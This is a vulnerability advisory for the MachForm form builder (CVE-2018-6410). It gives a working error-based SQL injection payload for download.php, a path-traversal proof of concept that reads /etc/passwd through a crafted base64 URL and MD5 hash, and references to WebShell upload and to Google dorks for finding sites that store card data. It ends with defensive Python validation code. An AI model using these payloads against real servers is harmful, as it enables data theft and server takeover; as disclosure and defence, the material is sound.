Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.

The application is widely deployed and with some Google dorks it's
possible to find various webpages storing sensitive data such as credit
card numbers with their corresponding security codes. Also, the arbitrary
file upload can let an attacker get control of the server by uploading
a WebShell.

[1] SQL injection (CVE-2018-6410):
-------------------------

[1.1] Description:
The software is subject to SQL injections in the 'download.php' file.

[1.2] Parameters and statement:
This SQLi can be found on the parameter 'q', which is a base64-encoded
value of the following parameters:

Which is the base64 encoding for:
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) ;&id=1&hash=1&form_id=1

[2] Path traversal:
-------------------------

[2.1] Description:
'download.php' is used to serve stored files from the form answers.
Modifying the name of the file to serve on the corresponding ap_form
table leads to a path traversal vulnerability.

[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set
element_4="../../../../../../../../../../../../../../../../etc/passwd"
where id=1;

Now in order to be able to download it, we need to access:
http://[URL]/[Machform_folder]/download.php?q=ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0NTgmZm9ybV9pZD01ODAwOQo=

Which is the base64 encoding for:
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009

Note that hash is the MD5 of the corresponding filename:
md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458
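As an added example, not code from the advisory or from MachForm itself: a hardened server-side handler covering both flaws above, in Python. It decodes 'q' into strictly typed fields (so a value like the SELECT in section [1.2] is rejected before any query is built) and checks that the filename read back from ap_form_<id> still resolves inside the upload directory, which the MD5 'hash' alone cannot guarantee once the row is attacker-controlled. The upload root, the form_<id> folder layout and all function names are assumptions.

```python
import base64
import os
import re
from typing import Optional
from urllib.parse import parse_qs

# Assumed upload root and per-form folder layout for this example; the
# advisory does not give MachForm's real data directory.
UPLOAD_ROOT = "/var/www/machform/data"

# Constructed samples: the advisory's PoC 'q' (decodes to
# el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009) and a
# shortened stand-in shaped like its SQLi payload.
SAMPLE_POC_Q = ("ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEw"
                "N2E0NTgmZm9ybV9pZD01ODAwOQo=")
SAMPLE_SQLI_Q = base64.b64encode(b"el=(SELECT 1)a;&id=1&hash=1&form_id=1").decode()

# Exact shape download.php expects: three plain integers and a 32-hex MD5.
PARAM_RULES = (("el", r"\d{1,10}"), ("id", r"\d{1,10}"),
               ("form_id", r"\d{1,10}"), ("hash", r"[0-9a-f]{32}"))


def parse_q(q: str) -> Optional[dict]:
    """Decode 'q' and type-check every field. Returns the parsed fields,
    or None when anything is off, so '(SELECT ...' never reaches SQL."""
    try:
        decoded = base64.b64decode(q, validate=True).decode("ascii")
        params = parse_qs(decoded.strip(), strict_parsing=True)
    except (ValueError, UnicodeDecodeError):
        return None
    if set(params) != {name for name, _ in PARAM_RULES}:
        return None  # extra or missing parameters
    out = {}
    for name, pattern in PARAM_RULES:
        values = params[name]
        if len(values) != 1 or not re.fullmatch(pattern, values[0]):
            return None  # repeated key or value of the wrong shape
        out[name] = values[0] if name == "hash" else int(values[0])
    return out


def stored_name_is_contained(stored_name: str, form_id: int) -> bool:
    """Containment check for the filename read back from ap_form_<form_id>:
    resolve it and require it to stay inside the form's own folder."""
    base = os.path.realpath(os.path.join(UPLOAD_ROOT, f"form_{form_id}"))
    target = os.path.realpath(os.path.join(base, stored_name))
    return os.path.commonpath([base, target]) == base
```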